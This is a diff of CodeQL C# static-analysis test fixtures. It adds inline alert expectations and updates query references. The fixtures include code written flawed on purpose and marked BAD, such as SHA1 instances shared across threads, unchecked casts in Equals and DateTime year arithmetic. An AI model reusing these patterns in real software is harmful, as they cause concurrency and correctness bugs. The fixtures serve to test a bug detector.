b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.cs index e886518dcdf1..9cf42b90263b 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.cs @@ -37,12 +37,12 @@ public ListNonStatic() /// public class Nest03 { - private static readonly Nest01 _n = new Nest01(); + private static readonly Nest01 _n = new Nest01(); // $ Alert } public class Nest04 { - static ListNonStatic _list = new ListNonStatic(); + static ListNonStatic _list = new ListNonStatic(); // $ Alert } public static class StaticMemberChildUsage @@ -53,7 +53,7 @@ public enum DigestAlgorithm SHA256, } - private static readonly IDictionary HashMap = new Dictionary + private static readonly IDictionary HashMap = new Dictionary // $ Alert { { DigestAlgorithm.SHA1, SHA1.Create() }, { DigestAlgorithm.SHA256, SHA256.Create() }, @@ -62,12 +62,12 @@ public enum DigestAlgorithm public class StaticMember { - private static SHA1 _sha1 = SHA1.Create(); + private static SHA1 _sha1 = SHA1.Create(); // $ Alert } public class IndirectStatic2 { - static Nest02 _n = new Nest02(); + static Nest02 _n = new Nest02(); // $ Alert } /// diff --git a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.qlref b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.qlref index e247961a538d..7a9c70237578 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransform/ThreadUnsafeICryptoTransform.qlref @@ -1 +1,2 @@ -Likely Bugs/ThreadUnsafeICryptoTransform.ql \ No newline at end of file +query: Likely Bugs/ThreadUnsafeICryptoTransform.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.cs b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.cs index f62c25025fc2..83018409f5cf 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.cs @@ -23,7 +23,7 @@ public static void Run(int max) // BUG expected var threads = Enumerable.Range(0, threadCount) - .Select(_ => new ThreadStart(start)) + .Select(_ => new ThreadStart(start)) // $ Alert .Select(x => new Thread(x)) .ToList(); foreach (var t in threads) t.Start(); @@ -85,7 +85,7 @@ public static void Run(int max) } }; var threads = Enumerable.Range(0, threadCount) - .Select(_ => new ThreadStart(start)) + .Select(_ => new ThreadStart(start)) // $ Alert .Select(x => new Thread(x)) .ToList(); foreach (var t in threads) t.Start(); @@ -143,12 +143,12 @@ public static void Run() { var bytes = new byte[4]; Convert.ToBase64String(sha1.ComputeHash(bytes)); - }, + }, // $ Alert () => { var bytes = new byte[4]; Convert.ToBase64String(sha1.ComputeHash(bytes)); - } + } // $ Alert ); } diff --git a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.qlref b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.qlref index 0a869270c9ba..f206d84cd77e 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/ThreadUnsafeICryptoTransformLambda/ThreadUnsafeICryptoTransformLambda.qlref @@ -1 +1,2 @@ -Likely Bugs/ThreadUnsafeICryptoTransformLambda.ql \ No newline at end of file +query: Likely Bugs/ThreadUnsafeICryptoTransformLambda.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.cs b/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.cs index 31e2336d0ca3..346dcc94c070 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.cs @@ -4,6 +4,6 @@ public class Test public override bool Equals(object other) { - return ((Test)other).Field == this.Field; + return ((Test)other).Field == this.Field; // $ Alert } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.qlref b/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.qlref index 4fc0cc8938f5..fa38710c7511 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/UncheckedCastInEquals/UncheckedCastInEquals.qlref @@ -1 +1,2 @@ -Likely Bugs/UncheckedCastInEquals.ql \ No newline at end of file +query: Likely Bugs/UncheckedCastInEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/Program.cs b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/Program.cs index b7b6b4d4e3a6..83c18ca52763 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/Program.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/Program.cs @@ -10,11 +10,11 @@ public PipelineProperties() { var now = DateTime.UtcNow; // BAD - this.Start = new DateTime(now.Year - 1, now.Month, now.Day, 0, 0, 0, DateTimeKind.Utc); + this.Start = new DateTime(now.Year - 1, now.Month, now.Day, 0, 0, 0, DateTimeKind.Utc); // $ Alert - var endYear = now.Year + 1; + var endYear = now.Year + 1; // $ Source // BAD - this.End = new DateTime(endYear, now.Month, now.Day, 0, 0, 1, DateTimeKind.Utc); + this.End = new DateTime(endYear, now.Month, now.Day, 0, 0, 1, DateTimeKind.Utc); // $ Alert // GOOD this.Start = now.AddYears(-1).Date; @@ -23,14 +23,14 @@ public PipelineProperties() private void Test(int year, int month, int day) { // BAD (arithmetic operation from StartTest) - this.Start = new DateTime(year, month, day); + this.Start = new DateTime(year, month, day); // $ Alert } public void StartTest() { var now = DateTime.UtcNow; // flows into Test (source for bug) - Test(now.Year - 1, now.Month, now.Day); + Test(now.Year - 1, now.Month, now.Day); // $ Source } public void StartTestFP() diff --git a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected index 72846a3bea12..60f88d172588 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected +++ b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.expected @@ -1,3 +1,7 @@ +#select +| Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:13:39:13:50 | ... - ... | arithmetic operation | +| Program.cs:17:37:17:43 | access to local variable endYear | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:15:27:15:38 | ... + ... : Int32 | arithmetic operation | +| Program.cs:26:39:26:42 | access to parameter year | Program.cs:33:18:33:29 | ... - ... : Int32 | Program.cs:26:39:26:42 | access to parameter year | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:33:18:33:29 | ... - ... : Int32 | arithmetic operation | edges | Program.cs:15:17:15:23 | access to local variable endYear : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | provenance | | | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:15:17:15:23 | access to local variable endYear : Int32 | provenance | | @@ -12,7 +16,3 @@ nodes | Program.cs:26:39:26:42 | access to parameter year | semmle.label | access to parameter year | | Program.cs:33:18:33:29 | ... - ... : Int32 | semmle.label | ... - ... : Int32 | subpaths -#select -| Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | Program.cs:13:39:13:50 | ... - ... | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:13:39:13:50 | ... - ... | arithmetic operation | -| Program.cs:17:37:17:43 | access to local variable endYear | Program.cs:15:27:15:38 | ... + ... : Int32 | Program.cs:17:37:17:43 | access to local variable endYear | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:15:27:15:38 | ... + ... : Int32 | arithmetic operation | -| Program.cs:26:39:26:42 | access to parameter year | Program.cs:33:18:33:29 | ... - ... : Int32 | Program.cs:26:39:26:42 | access to parameter year | This $@ based on a 'System.DateTime.Year' property is used in a construction of a new 'System.DateTime' object, flowing to the 'year' argument. | Program.cs:33:18:33:29 | ... - ... : Int32 | arithmetic operation | diff --git a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.qlref b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.qlref index 37fd40fb036c..8eebe63939d1 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/UnsafeYearConstruction/UnsafeYearConstruction.qlref @@ -1 +1,2 @@ -Likely Bugs/LeapYear/UnsafeYearConstruction.ql \ No newline at end of file +query: Likely Bugs/LeapYear/UnsafeYearConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.cs b/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.cs index fe5617c228a1..5bd7f5dcec08 100644 --- a/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.cs +++ b/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.cs @@ -11,7 +11,7 @@ public void M1(List animals) { Dog d = (Dog)a; d.Woof(); - } + } // $ Alert } public void M2(NonEnumerableClass nec) @@ -31,7 +31,7 @@ public void M3(Animal[] animals) { Dog d = (Dog)animal; d.Woof(); - } + } // $ Alert } public void M4(Array animals) @@ -41,7 +41,7 @@ public void M4(Array animals) { Dog d = (Dog)animal; d.Woof(); - } + } // $ Alert } public void M5(IEnumerable animals) @@ -51,7 +51,7 @@ public void M5(IEnumerable animals) { Dog d = (Dog)animal; d.Woof(); - } + } // $ Alert } public class NonEnumerableClass diff --git a/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.qlref b/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.qlref index 8d70f9995033..3731b64605f5 100644 --- a/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.qlref +++ b/csharp/ql/test/query-tests/Linq/MissedCastOpportunity/MissedCastOpportunity.qlref @@ -1 +1,2 @@ -Linq/MissedCastOpportunity.ql +query: Linq/MissedCastOpportunity.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.cs b/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.cs index d1326c70ee23..0fee1e9c48ff 100644 --- a/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.cs +++ b/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.cs @@ -13,7 +13,7 @@ public void M1(List lst) continue; Console.WriteLine(i); Console.WriteLine((i / 2)); - } + } // $ Alert // BAD: Can be replaced with lst.Where(e => e % 2 == 0) foreach (int i in lst) @@ -23,7 +23,7 @@ public void M1(List lst) Console.WriteLine(i); Console.WriteLine((i / 2)); } - } + } // $ Alert } public void M2(NonEnumerableClass nec) @@ -49,7 +49,7 @@ public void M3(int[] arr) Console.WriteLine(n); Console.WriteLine((n / 2)); } - } + } // $ Alert } public void M4(Array arr) @@ -73,7 +73,7 @@ public void M5(IEnumerable elements) { Console.WriteLine(element); } - } + } // $ Alert } public class NonEnumerableClass diff --git a/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.qlref b/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.qlref index 4a08b459a6c3..815371aba99c 100644 --- a/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.qlref +++ b/csharp/ql/test/query-tests/Linq/MissedWhereOpportunity/MissedWhereOpportunity.qlref @@ -1 +1,2 @@ -Linq/MissedWhereOpportunity.ql +query: Linq/MissedWhereOpportunity.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/MagicConstants/AttributeInts.cs b/csharp/ql/test/query-tests/MagicConstants/AttributeInts.cs index 370dc0a948f2..441525751b80 100644 --- a/csharp/ql/test/query-tests/MagicConstants/AttributeInts.cs +++ b/csharp/ql/test/query-tests/MagicConstants/AttributeInts.cs @@ -20,7 +20,7 @@ void f1() void f2() { // BAD - var x = 555 + + var x = 555 + // $ Alert[cs/magic-number] 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555 + 555; } diff --git a/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.cs b/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.cs index 5dd81b335f71..4100d12f93fc 100644 --- a/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.cs +++ b/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.cs @@ -3,7 +3,7 @@ class MyClass { public static void Main() { - System.Console.WriteLine("Hello, World!"); + System.Console.WriteLine("Hello, World!"); // $ Alert[cs/magic-string] System.Console.WriteLine("Hello, World!"); System.Console.WriteLine("Hello, World!"); System.Console.WriteLine("Hello, World!"); diff --git a/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.qlref b/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.qlref index c471ffedda83..7b0fd125d426 100644 --- a/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.qlref +++ b/csharp/ql/test/query-tests/MagicConstants/AttributeStrings.qlref @@ -1 +1,2 @@ -Bad Practices/Magic Constants/MagicConstantsString.ql \ No newline at end of file +query: Bad Practices/Magic Constants/MagicConstantsString.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/MagicConstants/HashCode.cs b/csharp/ql/test/query-tests/MagicConstants/HashCode.cs index 71308f8fb6c6..7767fa6499db 100644 --- a/csharp/ql/test/query-tests/MagicConstants/HashCode.cs +++ b/csharp/ql/test/query-tests/MagicConstants/HashCode.cs @@ -13,7 +13,7 @@ int NotHashCode() { // BAD: Number 391 is repeated. return - 391 + + 391 + // $ Alert[cs/magic-number] 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 391 + 397; } diff --git a/csharp/ql/test/query-tests/MagicConstants/MagicConstantsNumbers.qlref b/csharp/ql/test/query-tests/MagicConstants/MagicConstantsNumbers.qlref index 8047296eeeba..514381dce917 100644 --- a/csharp/ql/test/query-tests/MagicConstants/MagicConstantsNumbers.qlref +++ b/csharp/ql/test/query-tests/MagicConstants/MagicConstantsNumbers.qlref @@ -1 +1,2 @@ -Bad Practices/Magic Constants/MagicConstantsNumbers.ql \ No newline at end of file +query: Bad Practices/Magic Constants/MagicConstantsNumbers.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.cs b/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.cs index 35f1bbb1435a..039ac137dda2 100644 --- a/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.cs +++ b/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.cs @@ -16,12 +16,12 @@ class UseConstantNumber byte[] values2 = { 241 }; // BAD: Use constant - int values3 = 241; + int values3 = 241; // $ Alert[cs/use-number-constant] void Test() { // BAD: Use constant - var v1 = 241; + var v1 = 241; // $ Alert[cs/use-number-constant] // GOOD: Constant used var v2 = IntConstants.PUBLIC_CONST; diff --git a/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.qlref b/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.qlref index 65c1a785c6cf..75437932f589 100644 --- a/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.qlref +++ b/csharp/ql/test/query-tests/MagicConstants/MagicNumbersUseConstant.qlref @@ -1 +1,2 @@ -Bad Practices/Magic Constants/MagicNumbersUseConstant.ql \ No newline at end of file +query: Bad Practices/Magic Constants/MagicNumbersUseConstant.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.cs b/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.cs index c0b0fc8189c6..a09bf27c8d9a 100644 --- a/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.cs +++ b/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.cs @@ -14,12 +14,12 @@ class UseConstantString string[] values1 = { "abcdefgh" }; // BAD: Use constant - string values2 = "abcdefgh"; + string values2 = "abcdefgh"; // $ Alert[cs/use-string-constant] void Test() { // BAD: Use constant - var v1 = "abcdefgh"; + var v1 = "abcdefgh"; // $ Alert[cs/use-string-constant] // GOOD: Constant used. var v2 = StringConstants.PUBLIC_CONSTANT; diff --git a/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.qlref b/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.qlref index 72b6dcbab7d4..7ded4ffe161b 100644 --- a/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.qlref +++ b/csharp/ql/test/query-tests/MagicConstants/MagicStringsUseConstant.qlref @@ -1 +1,2 @@ -Bad Practices/Magic Constants/MagicStringsUseConstant.ql \ No newline at end of file +query: Bad Practices/Magic Constants/MagicStringsUseConstant.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Metrics/Files/FLinesOfCommentedCode/flinesofcommentedcode.qlref b/csharp/ql/test/query-tests/Metrics/Files/FLinesOfCommentedCode/flinesofcommentedcode.qlref index 85a80a9627eb..952183500693 100644 --- a/csharp/ql/test/query-tests/Metrics/Files/FLinesOfCommentedCode/flinesofcommentedcode.qlref +++ b/csharp/ql/test/query-tests/Metrics/Files/FLinesOfCommentedCode/flinesofcommentedcode.qlref @@ -1 +1 @@ -Metrics/Files/FLinesOfCommentedCode.ql \ No newline at end of file +query: Metrics/Files/FLinesOfCommentedCode.ql diff --git a/csharp/ql/test/query-tests/Metrics/RefTypes/TNumberOfFields/EnumSize.qlref b/csharp/ql/test/query-tests/Metrics/RefTypes/TNumberOfFields/EnumSize.qlref index c20a0d3886c1..67b897b1f5dc 100644 --- a/csharp/ql/test/query-tests/Metrics/RefTypes/TNumberOfFields/EnumSize.qlref +++ b/csharp/ql/test/query-tests/Metrics/RefTypes/TNumberOfFields/EnumSize.qlref @@ -1 +1 @@ -Metrics/RefTypes/TNumberOfFields.ql \ No newline at end of file +query: Metrics/RefTypes/TNumberOfFields.ql diff --git a/csharp/ql/test/query-tests/Metrics/Summaries/LinesOfCode.qlref b/csharp/ql/test/query-tests/Metrics/Summaries/LinesOfCode.qlref index 8c18065043fd..7510037b8101 100644 --- a/csharp/ql/test/query-tests/Metrics/Summaries/LinesOfCode.qlref +++ b/csharp/ql/test/query-tests/Metrics/Summaries/LinesOfCode.qlref @@ -1 +1 @@ -Metrics/Summaries/LinesOfCode.ql \ No newline at end of file +query: Metrics/Summaries/LinesOfCode.ql diff --git a/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.cs b/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.cs index 63b8d5b386eb..7d993b6b432a 100644 --- a/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.cs +++ b/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.cs @@ -7,7 +7,7 @@ static void Main(string[] args) { foreach (var arg in args) { - var sb = new StringBuilder(); // BAD: Creation in loop + var sb = new StringBuilder(); // BAD: Creation in loop // $ Alert sb.Append("Hello ").Append(arg); Console.WriteLine(sb); } @@ -33,7 +33,7 @@ void ControlFlow(string[] args) sb = new StringBuilder(); // GOOD: Not in all control paths else sb.Clear(); - lock (sb) sb = new StringBuilder(); // BAD: In all control paths + lock (sb) sb = new StringBuilder(); // BAD: In all control paths // $ Alert sb.Append("Hello ").Append(arg); Console.WriteLine(sb); } diff --git a/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.qlref b/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.qlref index 3b5d707f51e6..8b8d7b8e147b 100644 --- a/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.qlref +++ b/csharp/ql/test/query-tests/Performance/StringBuilderInLoop/StringBuilderInLoop.qlref @@ -1 +1,2 @@ -Performance/StringBuilderInLoop.ql \ No newline at end of file +query: Performance/StringBuilderInLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.cs b/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.cs index 4947363a083c..f37df5a73ccb 100644 --- a/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.cs +++ b/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.cs @@ -10,8 +10,8 @@ public Program() var x1 = ""; for (var i = 0; i < 1000; i++) { - x0 += "" + i; // BAD - x1 = x1 + i; // BAD + x0 += "" + i; // BAD // $ Alert + x1 = x1 + i; // BAD // $ Alert var x2 = ""; x2 += x1; // GOOD } diff --git a/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.qlref b/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.qlref index edd774f1e609..302e7fefd8a6 100644 --- a/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.qlref +++ b/csharp/ql/test/query-tests/Performance/StringConcatenationInLoop/StringConcatenationInLoop.qlref @@ -1 +1,2 @@ -Performance/StringConcatenationInLoop.ql \ No newline at end of file +query: Performance/StringConcatenationInLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.cs b/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.cs index 296ffaa82f27..9f39c43926e2 100644 --- a/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.cs +++ b/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.cs @@ -16,24 +16,24 @@ static void Main(string[] args) dict.TryGetValue(2, out x); // These are BAD - if (dict.ContainsKey(1)) x = dict[1]; - if (dict.ContainsKey(1) && dict[1] == 2) ; - if (!dict.ContainsKey(1) && dict[1] == 2) ; - if (!dict.ContainsKey(1) || dict[1] == 2) ; - if (dict.ContainsKey(1) || dict[1] == 2) ; + if (dict.ContainsKey(1)) x = dict[1]; // $ Alert + if (dict.ContainsKey(1) && dict[1] == 2) ; // $ Alert + if (!dict.ContainsKey(1) && dict[1] == 2) ; // $ Alert + if (!dict.ContainsKey(1) || dict[1] == 2) ; // $ Alert + if (dict.ContainsKey(1) || dict[1] == 2) ; // $ Alert - if (dict.ContainsKey(1)) + if (dict.ContainsKey(1)) // $ Alert x = dict[1]; else x = dict[1]; - if (!dict.ContainsKey(1)) + if (!dict.ContainsKey(1)) // $ Alert x = dict[1]; else x = dict[1]; - x = dict.ContainsKey(1) ? dict[1] : dict[1]; - x = !dict.ContainsKey(1) ? dict[1] : dict[1]; - x = true && !dict.ContainsKey(1) ? dict[1] : dict[1]; + x = dict.ContainsKey(1) ? dict[1] : dict[1]; // $ Alert + x = !dict.ContainsKey(1) ? dict[1] : dict[1]; // $ Alert + x = true && !dict.ContainsKey(1) ? dict[1] : dict[1]; // $ Alert // GOOD: Different index if (dict.ContainsKey(0)) x = dict[1]; diff --git a/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.qlref b/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.qlref index 13889c6245fc..5ca355f78242 100644 --- a/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.qlref +++ b/csharp/ql/test/query-tests/Performance/UseTryGetValue/UseTryGetValue.qlref @@ -1 +1,2 @@ -Performance/UseTryGetValue.ql \ No newline at end of file +query: Performance/UseTryGetValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.cs b/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.cs index f9914566bb98..b6b5c5639e00 100644 --- a/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.cs +++ b/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.cs @@ -6,11 +6,11 @@ class Test { // Test variable scope - IList v1 = new List(); // BAD: private scope + IList v1 = new List(); // BAD: private scope // $ Alert void f() { - var v2 = new List(); // BAD: local scope + var v2 = new List(); // BAD: local scope // $ Alert var x = v1.Contains(1); var y = v2.Contains(2); } @@ -27,7 +27,7 @@ void g() // Test initializer IList n3 = new List { 1, 2, 3 }; // GOOD: initialized - IList v3; // BAD: unassigned + IList v3; // BAD: unassigned // $ Alert void h() { @@ -52,7 +52,7 @@ void f1() n5 = new List { 1, 2, 3 }; n5.Contains(1); - var v4 = new List(); // BAD: assigned only from empty list + var v4 = new List(); // BAD: assigned only from empty list // $ Alert v4 = new List(); v4.Contains(1); @@ -73,30 +73,30 @@ void f3() void f4() { - var v5 = new Dictionary(); // BAD + var v5 = new Dictionary(); // BAD // $ Alert v5.ContainsKey(1); v5.ContainsValue(1); v5.GetEnumerator(); var tmp = new HashSet(); - var v6 = new HashSet(); // BAD + var v6 = new HashSet(); // BAD // $ Alert v6.IsSubsetOf(tmp); v6.IsProperSubsetOf(tmp); v6.IsSupersetOf(tmp); v6.IsProperSupersetOf(tmp); - var v7 = new LinkedList(); // BAD + var v7 = new LinkedList(); // BAD // $ Alert v7.Contains(1); - var v8 = new Queue(); // BAD + var v8 = new Queue(); // BAD // $ Alert v8.Dequeue(); v8.Peek(); v8.ToArray(); - var v9 = new Stack(); // BAD + var v9 = new Stack(); // BAD // $ Alert v9.Pop(); - var v10 = new List(); // BAD: property access + var v10 = new List(); // BAD: property access // $ Alert var x = v10.Count; } @@ -118,7 +118,7 @@ void f5() void f6() { - var v11 = new Dictionary(); // BAD: read by Index + var v11 = new Dictionary(); // BAD: read by Index // $ Alert var x = v11[1]; var n12 = new Dictionary(); // GOOD: written by Index @@ -155,7 +155,7 @@ void f8(object arguments) void f9() { - var l1 = new MyList(); // BAD + var l1 = new MyList(); // BAD // $ Alert var x1 = l1[0]; var l2 = new MyList(); // GOOD diff --git a/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.qlref b/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.qlref index 2f4f5248a6bb..623d63c75056 100644 --- a/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.qlref +++ b/csharp/ql/test/query-tests/ReadOnlyContainer/ReadOnlyContainer.qlref @@ -1 +1,2 @@ -Likely Bugs/Collections/ReadOnlyContainer.ql \ No newline at end of file +query: Likely Bugs/Collections/ReadOnlyContainer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref b/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref index da2dbc17be05..f7d09f0bf5cd 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-011/ASPNetDebug.qlref @@ -1 +1 @@ -Security Features/CWE-011/ASPNetDebug.ql \ No newline at end of file +query: Security Features/CWE-011/ASPNetDebug.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref b/csharp/ql/test/query-tests/Security Features/CWE-016/ASPNetMaxRequestLength/ASPNetMaxRequestLength.qlref index 7469d5d2e98a..a2914c126c3c 100644 --- a/csharp/ql/test/query-tests/Security 